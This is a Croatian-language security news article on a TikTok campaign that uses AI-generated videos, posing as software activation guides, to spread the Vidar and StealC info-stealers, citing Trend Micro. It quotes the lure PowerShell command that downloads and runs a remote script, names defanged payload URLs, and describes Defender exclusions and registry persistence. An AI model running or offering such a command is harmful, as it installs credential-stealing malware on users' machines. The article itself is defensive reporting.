Kibernetički kriminalci su otkrili novi način širenja zlonamjernog softvera iskorištavanjem ogromne baze korisnika i algoritamskog dosega TikToka.
Pojavila se sofisticirana kampanja društvenog inženjeringa koja koristi videozapise generirane umjetnom inteligencijom kako bi navela korisnike da preuzmu opasan zlonamjerni softver za krađu informacija, prerušen u vodiče za aktivaciju softvera.
Ovi obmanjujući videozapisi obećavaju pomoć korisnicima pri aktiviranju legitimnih aplikacija kao što su Windows OS, Microsoft Office, CapCut i Spotify, ali umjesto toga isporučuju poznate info-stealere Vidar i StealC nesuđenim žrtvama.
Ova kampanja predstavlja značajan napredak u taktici distribucije zlonamjernog softvera, udaljavajući se od tradicionalnih metoda isporuke putem interneta kako bi iskoristila povjerenje i angažman koji su inherentni platformama društvenih medija.
Za razliku od uobičajenih napada koji se oslanjaju na zlonamjerne web-stranice ili phishing putem e-pošte, ova operacija ugrađuje sve elemente društvenog inženjeringa izravno u video sadržaj, čineći detekciju znatno težom za sigurnosna rješenja.
Kriminalci iskorištavaju viralnu prirodu TikToka; jedan zlonamjerni videozapis je prikupio gotovo 500.000 pregleda, preko 20.000 lajkova i više od 100 komentara, demonstrirajući zabrinjavajući doseg i učinkovitost kampanje.
Analitičari Trend Micro-a identificirali su više TikTok računa uključenih u ovu operaciju, uključujući @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771, od kojih su svi od tada deaktivirani.
Istraživači su primijetili da su ovi računi objavljivali izrazito slične videozapise bez lica s glasovima generiranim umjetnom inteligencijom, što sugerira automatizirani proizvodni proces dizajniran za skalabilnost.
Tehnička sofisticiranost napada postaje očita u njegovoj metodologiji izvršenja.
Žrtve dobivaju upute da otvore PowerShell i izvrše naizgled bezopasan naredbu: iex (irm hxxps://allaivo[.]me/spotify). Ovaj PowerShell skript pokreće višestupanjski proces infekcije koji demonstrira napredne tehnike izbjegavanja.
Mehanizam infekcije i taktike postojanosti
Lanac infekcije zlonamjernog softvera otkriva pažljivo orkestrirane korake dizajnirane da osiguraju uspješnu kompromitaciju uz izbjegavanje detekcije.
Po izvršenju, početni PowerShell skript stvara skrivene direktorije unutar korisnikovih APPDATA i LOCALAPPDATA mapa, odmah dodajući te lokacije na popis iznimaka za Windows Defender kako bi se spriječilo skeniranje antivirusnim programima.
Skript zatim preuzima primarni teret s adrese hxxps://amssh[.]co/file.exe, koji sadrži varijante Vidar ili StealC zlonamjernog softvera.
Mehanizam postojanosti uključuje preuzimanje dodatnog PowerShell skripta s adrese hxxps://amssh[.]co/script[.]ps1 i uspostavljanje ključa registra koji osigurava izvršavanje zlonamjernog softvera pri pokretanju sustava.
Značajno je da Vidar koristi inovativnu strategiju zapovijedanja i upravljanja, zloupotrebljavajući legitimne usluge poput Steam profila i Telegram kanala kao Dead Drop Resolvere kako bi sakrio stvarne adrese C&C servera, čineći napore detekcije i uklanjanja znatno složenijim.
